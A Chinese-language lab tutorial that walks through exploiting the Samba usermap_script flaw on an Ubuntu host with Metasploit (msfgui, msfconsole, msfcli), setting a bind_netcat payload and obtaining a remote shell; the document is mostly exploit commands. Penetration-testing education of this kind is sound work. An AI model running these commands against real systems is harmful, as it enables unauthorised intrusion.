打开图形化工具
打开终端,输入
msfgui
metasploit的图形化界面
由于BT5中可以在终端打开图形化界面,但是在最新版本中已经移除msfgui的命令了。
选择no
我们打开ubuntu的服务器
查看获取的IP地址
我们选择exploit模块,multi选项,选择samba,选择usermap_script
链接成功的画面
我们选择cmd里面的unix ,里面的bind—netcat
设置目标的IP地址
选择run exploit
我们看到shell选项,数量变为1
hosts的状态变为alive
通过shell命令,可以知道已经链接上ubuntu服务器了
通过MSF终端进行操作
输入
msfconsole
通过help查看帮助
查找samba服务的漏洞
search samba
发现服务漏洞脚本
use exploit/multi/samba/usermap_script
输入show options来查看选择
show options
set RHOST 192.168.10.254
设置目标IP地址
输入show payloads 选择攻击载荷
show payloads
选择cmd 、unix、bind-netcat
set payload cmd/unix/bind_netcat
输入exploit,开始启动
exploit
已经成功反弹一个shell
使用msfcli进行控制
msf使用一个调用接口
以samba漏洞服务为例
输入
msfcli multi/samba/usermap_script PLAYLOAD=cmd/unix/bind_netcat RHOST=192.168.10.254 E
msfcli(使用接口)
multi/samba/usermap_script(渗透攻击模块)
PLAYLOAD=cmd/unix/bind_netcat(攻击载荷模块)
RHOST=192.168.10.254(目标地址)
E(执行,exploit)
效果是一样的。